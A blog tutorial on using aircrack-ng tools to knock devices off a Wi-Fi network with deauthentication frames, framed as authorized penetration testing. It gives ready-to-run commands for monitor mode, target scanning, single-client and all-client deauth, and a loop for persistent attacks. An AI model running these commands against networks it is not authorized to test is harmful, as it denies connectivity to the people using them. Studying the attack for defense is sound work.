🚫 Hack the Wi-Fi, Not the Law: How to Disconnect Devices Using Aireplay-ng

Taha IftikharTaha Iftikhar
4 min read

Disclaimer: This guide is intended for educational and authorized penetration testing purposes only. Do not use these techniques on networks or devices you do not own or have explicit permission to test. Unauthorized use may be illegal and unethical.


Overview

In this guide, we will learn how to temporarily disconnect a specific device (like your phone or tablet) from a Wi-Fi network using a deauthentication (deauth) attack. This is a common part of wireless penetration testing.

We'll use the aircrack-ng suite, which includes tools like:

  • airmon-ng to enable monitor mode

  • airodump-ng to scan Wi-Fi networks and devices

  • aireplay-ng to send deauth packets


Requirements

  • A computer running Linux (e.g., Kali Linux or Ubuntu)

  • A wireless adapter that supports monitor mode and packet injection

  • Aircrack-ng suite installed


How to Check If Your Wi-Fi Card Supports Monitor Mode

Before beginning, it's essential to check if your wireless card supports monitor mode.

Step 1: Identify your wireless card

iwconfig

Look for your Wi-Fi interface (e.g., wlan0).

Step 2: Check capabilities with iw

sudo iw list | grep -A 10 'Supported interface modes'

You should see something like:

Supported interface modes:
     * IBSS
     * managed
     * AP
     * monitor

If monitor is listed — you're good to go!


Step-by-Step Process

Step 1: Kill Interfering Processes and Start Monitor Mode

Run these commands in a terminal:

sudo airmon-ng check kill
sudo airmon-ng start wlan0
  • This disables services like wpa_supplicant that interfere with monitor mode.

  • Monitor mode will be enabled on a new interface, usually wlan0mon.

Output Example:

Killing these processes:
  PID Name
15776 wpa_supplicant

Interface       Driver      Chipset
wlan0           iwlwifi     Intel Corporation Comet Lake PCH CNVi WiFi

Step 2: Scan for Nearby Wi-Fi Networks

sudo airodump-ng wlan0mon
  • This scans all available Wi-Fi networks and clients.

  • Look for:

    • BSSID (MAC of router)

    • CH (channel number)

    • STATION (MAC of connected devices)

Example target:

  • BSSID: 40:48:6E:17:DA:79 (Wi-Fi router)

  • STATION: 1E:B3:52:A9:40:0E (your tablet)

  • Channel: 6

Press Ctrl+C to stop once you’ve found your target.


Step 3: Focus on Targeted Network

sudo airodump-ng -c 6 --bssid 40:48:6E:17:DA:79 -w capture wlan0mon
  • -c 6: Lock to channel 6

  • --bssid: Filter only the target router

  • -w capture: Save captured data to a file (optional)

Keep this running in the background to continue monitoring the target.


Step 4: Deauth the Target Device

In a new terminal window, run:

sudo aireplay-ng --deauth 100 -a 40:48:6E:17:DA:79 -c 1E:B3:52:A9:40:0E wlan0mon
  • --deauth 100: Send 100 deauthentication packets

  • -a: Target BSSID (router)

  • -c: Client MAC (tablet)

  • wlan0mon: Interface in monitor mode

Sample output:

Sending 64 directed DeAuth (code 7). STMAC: [1E:B3:52:A9:40:0E] [52|442 ACKs]

TIP: If the device reconnects fast, increase the number or loop the command.

To disconnect all clients from the router:

sudo aireplay-ng --deauth 1000 -a 40:48:6E:17:DA:79 wlan0mon

Step 5: Restore Network Services

After you're done:

sudo airmon-ng stop wlan0mon
sudo service NetworkManager restart

This will:

  • Disable monitor mode

  • Restart normal Wi-Fi connectivity


Summary of Commands

# Check monitor mode support
sudo iw list | grep -A 10 'Supported interface modes'

# Start monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0

# Scan and attack
sudo airodump-ng wlan0mon
sudo airodump-ng -c <channel> --bssid <BSSID> -w capture wlan0mon
sudo aireplay-ng --deauth 100 -a <BSSID> -c <Client MAC> wlan0mon

# Restore normal mode
sudo airmon-ng stop wlan0mon
sudo service NetworkManager restart

Why This Works

  • Deauthentication is a management frame in Wi-Fi.

  • These frames aren't encrypted, so anyone can spoof and send them.

  • Devices receiving a deauth packet will disconnect temporarily, and most will try to reconnect.


Troubleshooting

  • No devices disconnecting? Your adapter may not support injection properly.

  • Low signal strength? Move closer to the target.

  • Not seeing STATION MACs? Try generating traffic on the target device (e.g., open a video).

  • Using 5GHz? Ensure your adapter supports 5GHz.


Additional Ideas

  • Use Wireshark to view captured traffic in real time.

  • Try aireplay-ng with loop for persistent attacks:

while true; do sudo aireplay-ng --deauth 50 -a <BSSID> -c <Client MAC> wlan0mon; sleep 1; done

Final Notes

This guide shows how Wi-Fi deauth attacks work at a basic level. Use it to understand vulnerabilities, test defenses, and learn ethical hacking — never for malicious purposes.

Stay curious, stay ethical, and always test responsibly ✨

0
Subscribe to my newsletter

Read articles from Taha Iftikhar directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Written by

Taha Iftikhar
Taha Iftikhar